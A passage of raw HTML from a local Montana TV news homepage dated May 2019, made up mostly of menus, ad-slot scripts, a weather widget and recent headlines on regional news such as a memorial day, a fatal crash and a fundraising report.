href="https://ktvq.com/category/news-team/"><span>Q2 News Staff</span></a></li> </ul> </li> </ul><ul id="menu-main-menu-3" class="mobile-menu visible-xs"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children first-item menu-item-4708"><a href="https://ktvq.com/category/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/"><span>Local News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/"><span>Political News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/"><span>Montana News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/"><span>National News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/"><span>Crime Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/"><span>Digital Original</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/"><span>Montana Ag Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/"><span>Montana Made</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/"><span>Q2 Rewind</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/"><span>Fire Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/"><span>Trending</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/"><span>STORMTracker Doppler</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/"><span>Travel Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/"><span>Interactive Radar Map</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/"><span>Ski Report</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com"><span>Sports</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/"><span>Community</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass"><span>MTN Powder Pass</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&amp;showSplashPopup=true"><span>Foodie Fridays</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/"><span>A Better You</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/"><span>A Waiting Child</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com"><span>Under the Big Sky</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/"><span>Students of the Week</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/"><span>Athlete of the Week</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/"><span>Montana Matters</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/"><span>On the Job with Rob</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/"><span>Submit Anniversary or Birthday</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/"><span>KTVQ Polls</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/"><span>One School at a Time</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/"><span>Build Billings</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&amp;h=8638457"><span>2019 Golf Card</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/"><span>Sponsored</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/"><span>Video</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/"><span>Photo Galleries</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/"><span>Watch Q2 News Live</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/"><span>On KTVQ</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/"><span>About</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/"><span>Contact Us</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/"><span>Closed Captioning Information</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/"><span>Jobs at KTVQ</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/"><span>Q2 Apps</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/"><span>Q2 News Staff</span></a></li> </ul> </li> </ul> <div class="search-header hidden-xs"> <a href="javascript:void(0);" class="search-toggle" data-target="#search-section-sticky"> <i class="fa fa-search"></i> </a> </div> </div> </div> </nav><!--.nav-menu --> </div><!-- /.container --> <div class="hidden-xs"> <div id="search-section-sticky" class="search-section" style="display: none;"> <div class="container"> <form role="search" method="get" class="form form-search" action="https://ktvq.com/"> <label for="s"> <span class="sr-only">Search for:</span> <input type="search" title="Search" name="s" value="" placeholder="Search..." class="field search-field"> </label> <button value="Search" class="search-submit button" type="submit">Search</button> </form> </div> </div> </div> </div> <div class="layout-content boxed"> <!-- Layout Content --> <div id="primary"> <div class="container"> <div id="content" class="row"> <div class="elementor elementor-672"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section data-id="4f5822a" class="elementor-element elementor-element-4f5822a elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="422a056f" class="elementor-element elementor-element-422a056f elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="dbcc0aa" class="elementor-element elementor-element-dbcc0aa elementor-widget elementor-widget-sidebar" data-element_type="sidebar.default"> <div class="elementor-widget-container"> <div id="breaking-news-app"></div> </div> </div> <div data-id="76d4497a" class="elementor-element elementor-element-76d4497a elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-2" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-2'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="4382c9d" class="elementor-element elementor-element-4382c9d elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="fe473d6" class="elementor-element elementor-element-fe473d6 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="b6c03e1" class="elementor-element elementor-element-b6c03e1 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-2" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-2'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="33678661" class="elementor-element elementor-element-33678661 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="eafe46e" class="elementor-element elementor-element-eafe46e elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="5367605e" class="elementor-element elementor-element-5367605e elementor-section-full_width elementor-reverse-mobile elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="f75ccd2" class="elementor-element elementor-element-f75ccd2 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="7b934a76" class="elementor-element elementor-element-7b934a76 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post grid-item grid-one post-202568 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-day tag-helena tag-memorial tag-montana tag-officer tag-police "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/2019/05/16/montana-law-enforcement-honors-the-fallen-on-peace-officers-memorial-day/" title="Montana law enforcement honors the fallen on Peace Officers Memorial Day" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16073420/pday2.jpg" alt="Montana law enforcement honors the fallen on Peace Officers Memorial Day" class="media-object" /> <div class="category-label"><div><span>News</span></div></div> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/2019/05/16/montana-law-enforcement-honors-the-fallen-on-peace-officers-memorial-day/" title="Montana law enforcement honors the fallen on Peace Officers Memorial Day" rel="bookmark">Montana law enforcement honors the fallen on Peace Officers Memorial Day</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:35 am</span> </div> </div> </div> </div></div> </div> </div> <div data-id="29c06ca0" class="elementor-element elementor-element-29c06ca0 ad-leaderboard elementor-hidden-desktop elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-1" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-1'); }); </script> </div> </div> <div data-id="b0524df" class="elementor-element elementor-element-b0524df elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="row recent-post-wrap-grid"><div class="recent-post grid-item grid-three col-sm-4 col-xs-12 post-202561 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-trending tag-boy tag-found tag-kentucky "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/trending/2019/05/16/video-extra-missing-almost-3-days-toddler-found-alive/" title="Video Extra: Missing almost 3 days, toddler found alive" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16072032/bfound.jpg" alt="Video Extra: Missing almost 3 days, toddler found alive" class="media-object" /> <div class="category-label"><div><span>Trending</span></div></div> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/trending/2019/05/16/video-extra-missing-almost-3-days-toddler-found-alive/" title="Video Extra: Missing almost 3 days, toddler found alive" rel="bookmark">Video Extra: Missing almost 3 days, toddler found alive</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:24 am</span> </div> </div> </div> </div><div class="recent-post grid-item grid-three col-sm-4 col-xs-12 post-202556 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-trending tag-bus tag-push "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/trending/2019/05/16/las-vegas-woman-arrested-on-murder-charge-after-elderly-man-pushed-off-bus/" title="Las Vegas woman arrested on murder charge after elderly man pushed off bus" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16070920/buspush1.jpg" alt="Las Vegas woman arrested on murder charge after elderly man pushed off bus" class="media-object" /> <div class="category-label"><div><span>Trending</span></div></div> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/trending/2019/05/16/las-vegas-woman-arrested-on-murder-charge-after-elderly-man-pushed-off-bus/" title="Las Vegas woman arrested on murder charge after elderly man pushed off bus" rel="bookmark">Las Vegas woman arrested on murder charge after elderly man pushed off bus</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:13 am</span> </div> </div> </div> </div><div class="recent-post grid-item grid-three col-sm-4 col-xs-12 post-202537 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-ag-network category-montana-news category-news tag-beef tag-may tag-montana-ag tag-month "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-may-is-national-beef-month/" title="Montana Ag Network: May is National Beef Month" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16065144/bmonth.jpg" alt="Montana Ag Network: May is National Beef Month" class="media-object" /> <div class="category-label"><div><span>Montana Ag Network</span></div></div> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-may-is-national-beef-month/" title="Montana Ag Network: May is National Beef Month" rel="bookmark">Montana Ag Network: May is National Beef Month</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">6:54 am</span> </div> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="38f87533" class="elementor-element elementor-element-38f87533 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="55ebd7a1" class="elementor-element elementor-element-55ebd7a1 elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default"><a href="http://ktvq.com/weather/">Weather</a></h5> </div> </div> <div data-id="5654881" class="elementor-element elementor-element-5654881 elementor-widget elementor-widget-template" data-element_type="template.default"> <div class="elementor-widget-container"> <div class="elementor-template"> <div class="elementor elementor-116582 elementor-type-section"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section data-id="2a8dab27" class="elementor-element elementor-element-2a8dab27 elementor-section-content-top elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="2dcf288d" class="elementor-element elementor-element-2dcf288d elementor-column elementor-col-50 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="75aa6dcb" class="elementor-element elementor-element-75aa6dcb elementor-widget elementor-widget-wp-widget-current_conditions" data-element_type="wp-widget-current_conditions.default"> <div class="elementor-widget-container"> <div class="current-conditions full-width"> <div class="current-conditions-slides"> <div class="station" data-slide-number="0" data-station-id="KBIL"> <div class="station-condition"> <i class="wi wi-day-sunny-overcast" data-condition="Partly Cloudy" data-condition-abbrv="sct" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Billings </div> <div class="station-temperature" style="color:#212121"> 52&deg; </div> </div> <div class="station" data-slide-number="1" data-station-id="KLVM"> <div class="station-condition"> <i class="wi wi-day-cloudy" data-condition="Cloudy" data-condition-abbrv="ovc" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Livingston </div> <div class="station-temperature" style="color:#212121"> 50&deg; </div> </div> <div class="station" data-slide-number="2" data-station-id="KMLS"> <div class="station-condition"> <i class="wi wi-day-sunny-overcast" data-condition="Partly Cloudy" data-condition-abbrv="sct" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Miles City </div> <div class="station-temperature" style="color:#212121"> 46&deg; </div> </div> <div class="station" data-slide-number="3" data-station-id="KGDV"> <div class="station-condition"> <i class="wi wi-day-cloudy" data-condition="Cloudy" data-condition-abbrv="ovc" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Glendive </div> <div class="station-temperature" style="color:#212121"> 44&deg; </div> </div> <div class="station" data-slide-number="4" data-station-id="KSDY"> <div class="station-condition"> <i class="wi wi-day-cloudy" data-condition="Cloudy" data-condition-abbrv="ovc" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Sidney </div> <div class="station-temperature" style="color:#212121"> 44&deg; </div> </div> <div class="station" data-slide-number="5" data-station-id="KBHK"> <div class="station-condition"> <i class="wi wi-day-cloudy" data-condition="Mostly Cloudy" data-condition-abbrv="bkn" style="color:#0A246A"></i> </div> <div class="station-title" style="color:#212121"> Baker </div> <div class="station-temperature" style="color:#212121"> 47&deg; </div> </div> </div> </div> </div> </div> </div> </div> </div> <div data-id="6a583754" class="elementor-element elementor-element-6a583754 elementor-column elementor-col-50 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="57af52fe" class="elementor-element elementor-element-57af52fe elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-4" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-4'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="5247a951" class="elementor-element elementor-element-5247a951 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="5fd62f9a" class="elementor-element elementor-element-5fd62f9a elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap"> <div class="elementor-widget-wrap"> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </div> <div data-id="ff3220f" class="elementor-element elementor-element-ff3220f elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post grid-item grid-one post-202499 post type-post status-publish format-standard has-post-thumbnail hentry category-weather tag-billings tag-forecast tag-weather "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/weather/2019/05/16/q2-weather-here-comes-the-rain-and-cooler-temperatures/" title="Q2 Weather: Here comes the rain and cooler temperatures" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16053937/EdMasterHD10.jpg" alt="Q2 Weather: Here comes the rain and cooler temperatures" class="media-object" /> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/weather/2019/05/16/q2-weather-here-comes-the-rain-and-cooler-temperatures/" title="Q2 Weather: Here comes the rain and cooler temperatures" rel="bookmark">Q2 Weather: Here comes the rain and cooler temperatures</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:40 am</span> </div> </div> </div> </div></div> </div> </div> <div data-id="9c8a4bd" class="elementor-element elementor-element-9c8a4bd elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-5" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-5'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="73363b54" class="elementor-element elementor-element-73363b54 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="1ad2bc8d" class="elementor-element elementor-element-1ad2bc8d elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="79a5d587" class="elementor-element elementor-element-79a5d587 ad-leaderboard elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-8" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-8'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="1b85b63" class="elementor-element elementor-element-1b85b63 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="11ff67b6" class="elementor-element elementor-element-11ff67b6 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="3e9c4390" class="elementor-element elementor-element-3e9c4390 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="3967c368" class="elementor-element elementor-element-3967c368 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="69175fe9" class="elementor-element elementor-element-69175fe9 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="/ktvq/category/news/">More News</a></h2> </div> </div> </div> </div> </div> <div data-id="56c23256" class="elementor-element elementor-element-56c23256 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="2969e7d9" class="elementor-element elementor-element-2969e7d9 elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="692b7e67" class="elementor-element elementor-element-692b7e67 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="40cb7e65" class="elementor-element elementor-element-40cb7e65 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="159f0f7c" class="elementor-element elementor-element-159f0f7c elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post grid-item grid-one post-202527 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-ag-network category-montana-news category-news tag-hunt tag-montana-ag tag-shed tag-sun-river "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-shed-hunting-begins-near-augusta/" title="Montana Ag Network: Shed hunting begins near Augusta" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16063152/shedhunt.jpg" alt="Montana Ag Network: Shed hunting begins near Augusta" class="media-object" /> <div class="category-label"><div><span>Montana Ag Network</span></div></div> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-shed-hunting-begins-near-augusta/" title="Montana Ag Network: Shed hunting begins near Augusta" rel="bookmark">Montana Ag Network: Shed hunting begins near Augusta</a> </h4> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">6:33 am</span> </div> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="46171cc" class="elementor-element elementor-element-46171cc elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="59241428" class="elementor-element elementor-element-59241428 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post media list-item post-202495 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-4867 tag-games tag-great-falls tag-montana tag-special-olympics tag-summer "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/special-olympics-montana-kicks-off-summer-games-with-opening-ceremonies/">Special Olympics Montana kicks off summer games with Opening Ceremonies</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:43 am</span> </div> </div> </div><div class="recent-post media list-item post-202472 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-crash tag-fatal tag-montana tag-west-glacier "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/2-women-killed-child-injured-in-crash-near-west-glacier/">2 women killed, child injured in crash near West Glacier</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:52 am</span> </div> </div> </div><div class="recent-post media list-item post-202458 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-bullock tag-money tag-president tag-raised "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/bullock-campaign-says-1m-raised-in-first-24-hours/">Bullock campaign says $1M raised in first 24 hours</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:31 am</span> </div> </div> </div><div class="recent-post media list-item post-202452 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-bison tag-dog tag-yellowstone-national-park "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/watch-small-dog-runs-around-bison-in-yellowstone-national-park/">WATCH: Small dog runs around bison in Yellowstone National Park</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:25 am</span> </div> </div> </div></div> </div> </div> <div data-id="211480c" class="elementor-element elementor-element-211480c elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-12" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-12'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="75267bd0" class="elementor-element elementor-element-75267bd0 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="26b7050c" class="elementor-element elementor-element-26b7050c elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="4095f955" class="elementor-element elementor-element-4095f955 ad-leaderboard elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-10" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-10'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="3c2e96ed" class="elementor-element elementor-element-3c2e96ed elementor-section-full_width elementor-section-height-default 